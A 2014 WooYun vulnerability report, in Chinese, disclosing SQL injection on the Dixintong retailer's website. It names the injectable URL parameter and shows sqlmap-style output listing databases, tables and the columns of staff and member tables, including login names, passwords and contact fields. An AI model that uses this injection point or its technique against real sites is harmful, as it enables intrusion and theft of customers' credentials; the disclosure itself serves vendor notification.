当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067877

漏洞标题:迪信通官网SQL注入

相关厂商:迪信通

漏洞作者: jaffer

提交时间:2014-07-11 12:44

修复时间:2014-10-09 12:46

公开时间:2014-10-09 12:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-10-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

百度百家67期(昨天)争鸣说道,迪信通转型成功吗?这不,刚上市,就有这么大一个漏洞。

详细说明:

注入点:

http://www.dixintong.com/activityshow.aspx?aId=660


database:

available databases [9]:
[*] crm
[*] dixintong
[*] master
[*] model
[*] msdb
[*] official
[*] tempdb
[*] wxcrm
[*] xnyycrm


看几张表就知道了

Database: dixintong
[50 tables]
+----------------------------+
| dbo.Account                |
| dbo.AccountAddr            |
| dbo.AccountBasics          |
| dbo.AccountCash            |
| dbo.AccountFavor           |
| dbo.AccountMess            |
| dbo.AccountMessItem        |
| dbo.AccountSafe            |
| dbo.AccountSubscribe       |
| dbo.DictArea1              |
| dbo.DictArea2              |
| dbo.DictArea3              |
| dbo.DictCateX              |
| dbo.DictCourse             |
| dbo.Product                |
| dbo.ProductAssess          |
| dbo.ProductAssrep          |
| dbo.ProductAttrItem        |
| dbo.ProductFlag            |
| dbo.ProductImage           |
| dbo.ProductMobile          |
| dbo.ProductMobileRatio     |
| dbo.ProductNote            |
| dbo.ProductNoteTemp        |
| dbo.ProductPrice           |
| dbo.ProductStatus          |
| dbo.ProductSuburb          |
| dbo.ProductTemp            |
| dbo.ProductTempItem        |
| dbo.SaleOrder              |
| dbo.SaleOrderItem          |
| dbo.SaleOrderShare         |
| dbo.SaleOrderStatus        |
| dbo.Staff                  |
| dbo.SysChannel             |
| dbo.SysMail                |
| dbo.SysMailTemp            |
| dbo.SysPower               |
| dbo.SysRole                |
| dbo.SysRolePower           |
| dbo.SysStatistics          |
| dbo.SysUser                |
| dbo.SysUserRole            |
| dbo.V_AccountFavor         |
| dbo.V_AccountMess          |
| dbo.V_PersonlAccountReport |
| dbo.V_Product              |
| dbo.V_ProductPrice         |
| dbo.V_SaleOrder            |
| dbo.V_SaleOrderItemReport  |
+----------------------------+


Database: dixintong
Table: dbo.Staff
[7 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| Area       | nvarchar |
| Company    | nvarchar |
| CreateTime | datetime |
| SoreName   | nvarchar |
| StaffCode  | nvarchar |
| StaffName  | nvarchar |
| SysNo      | int      |
+------------+----------+


Database: crm
[59 tables]
+----------------------------+
| dbo.AdminNav               |
| dbo.Article                |
| dbo.ArticleClass           |
| dbo.BrandInfo              |
| dbo.BugerInfo              |
| dbo.Company                |
| dbo.CompanyProduct         |
| dbo.Dispose                |
| dbo.EOrderMem              |
| dbo.HistoryCompanyProduct  |
| dbo.HistoryProduct         |
| dbo.ProCPU                 |
| dbo.ProColor               |
| dbo.ProDB                  |
| dbo.ProDjms                |
| dbo.ProFbl                 |
| dbo.ProMemory              |
| dbo.ProOperator            |
| dbo.ProPlatform            |
| dbo.ProPmcc                |
| dbo.ProPmcz                |
| dbo.ProSxtpx               |
| dbo.ProSystem              |
| dbo.ProTypeInfo            |
| dbo.ProWlpl                |
| dbo.ProWlzs                |
| dbo.ProXsmd                |
| dbo.Product                |
| dbo.ProductClass           |
| dbo.Reservation            |
| dbo.Role                   |
| dbo.SysUser                |
| dbo.SystemLog              |
| dbo.View_Article           |
| dbo.View_CompanyProduct    |
| dbo.View_Orders            |
| dbo.View_Product           |
| dbo.View_QuestionAndAnswer |
| dbo.View_contractProduct   |
| dbo.View_mdztorder         |
| dbo.View_questionnaire     |
| dbo.activity               |
| dbo.answer                 |
| dbo.comtowxgroups          |
| dbo.contractProduct        |
| dbo.greentravel            |
| dbo.mdztorders             |
| dbo.member                 |
| dbo.message                |
| dbo.mount                  |
| dbo.orders                 |
| dbo.orderstate             |
| dbo.question               |
| dbo.questionnaire          |
| dbo.sqlmapoutput           |
| dbo.staffinfo              |
| dbo.storeType              |
| dbo.storefront             |
| dbo.wxhuodong              |
+----------------------------+


用户信息table

Database: crm
Table: dbo.member
[22 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| address        | varchar  |
| addtime        | datetime |
| area           | varchar  |
| city           | varchar  |
| Email          | varchar  |
| Id             | int      |
| integral       | int      |
| IsOldmem       | int      |
| isOpen         | int      |
| lastLogIp      | varchar  |
| lasttime       | datetime |
| loginName      | varchar  |
| loginPwd       | varchar  |
| logNum         | int      |
| memberCode     | varchar  |
| mlevel         | varchar  |
| nickname       | varchar  |
| productPicture | varchar  |
| province       | varchar  |
| QQ             | varchar  |
| tel            | varchar  |
| weixin         | varchar  |
+----------------+----------+


漏洞证明:

看看上面的各种表吧。
所有信息都出来了。
赶快修复吧。建议对网站进行一次渗透测试。

修复方案:

版权声明:转载请注明来源 jaffer@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝